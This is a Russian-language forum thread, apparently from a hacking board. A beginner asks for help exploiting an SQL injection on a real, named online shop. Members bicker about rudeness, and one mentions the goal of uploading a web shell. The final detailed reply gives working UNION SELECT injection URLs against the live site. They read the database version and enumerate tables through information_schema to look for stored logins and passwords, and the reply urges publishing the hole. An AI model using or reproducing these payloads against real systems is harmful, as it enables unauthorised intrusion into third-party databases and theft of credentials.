Помогите народ,только учусь, вот сайт http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11-- если можно запишите видео,забыл сказать сайт взят с вашего форума,просто что бы некоторые люди не думали что я хочу когото натравить так сказать Оч благодарен Ув.Администрация не удаляйте тему!!
не хочешь напреч извилины? иди в жопу! никто тебе подарок не сделает! тебе дали статью sql иньекций, и всё что может дополнительно понадобится есть в гугле, ты очередной лентяй, который хочет что то сделать, но при этом ничего не делая! вали на какой нить хакер ру
Но ведь и правда хамят. Причем как быдлоиды какие-то. Поддерживаю ТС. Ищи просто в другом месте. Будь спокойней. Не обращай внимания. PS: Если не хочется отвечать или вопрос кажется глупым - простое же решение - не отвечать.
История, с моими комментариями: Адекватный ответ. Результат. А что делал, как делал и каков результат? Адекватный ответ. Вновь никаких подробностей. Это уже как результат, с эмоциями. P.S. А вообще данная проблема должна быть здесь - http://forum.antichat.ru/thread21336.html В тему одна хорошая и в то же время простая фраза: "Научитесь читать, прежде чем писать."
Охотник, давайте будем чуть более терпимее и уважительнее к человеку, который пришел на форум по ИБ с конкретным вопросом, а не с целью запостить свою "фоточку", феерию чего мы тут недавно наблюдали, а также будем начинать предложения с большой буквы, не пропускать дефисы в конструкциях вида "какой нить" и не забывать про точки. Безусловно, ваши посты, набитые в основном в болталке и в новостной тематике выдают вас с головой как гуру уязвимостей, и перед чем мы, безусловно, преклоняем голову. 2sh1ck По сути, если следовать терминологии, представленный вами код(ссылка) уже является так называемой sql-инъекцией, поскольку мы смогли, используя уязвимый параметр, изменить логику обращения к БД, изначально задуманной программистом по несколько другому сценарию, и вывести некоторую полезную информацию. К сожалению, для конечной реализации подобной уязвимости, а именно заливки веб-шелла, с целью выполнения команд на удаленном сервере, в данном случае не выполняются некоторые условия - именно о них вы сможете почитать по ссылке, любезно предоставленной многоуважаемым мембером античата Охотником, а именно http://forum.antichat.ru/thread43966.html Но в вашем случае, я бы начал с общей теории реляционных баз данных и операторов(команд), которые используется для работы с информацией. И, да, ваш вопрос был бы более уместен в разделе "Уязвимости". Удачи.
а что там непонятного? Смотриш версию http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11-- видеш вывод 5.0.86-log понимаеш что повезло что 5-я ветка далее выводиш все таблы table_name http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables+limit+0,1-- перебирая лимитом от 0 и до последней в данном случае до 22 т е http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables+limit+22,1-- понимаеш что таблы админ или юсер нет (где обычно хранятся логины и пассы) и с чистой совестью выкладываеш эту скулю в паблик т к в 90% ты с этим ничего не сделаеш если не секрет- что ты там обходить собрался? И большая просьба, если научился пользоваться софтом- право грубить юзерам, которые хотят чемуто научиться,- это не дает P.S. Убери все пробелы которые всобачил форум в запросы
Терпимее надо быть, все правильно. Люди все разные, кто-то быстрей понимает, кто то ни сразу... ни надо хамить, никто из нас с ноутом в руках не рождался.
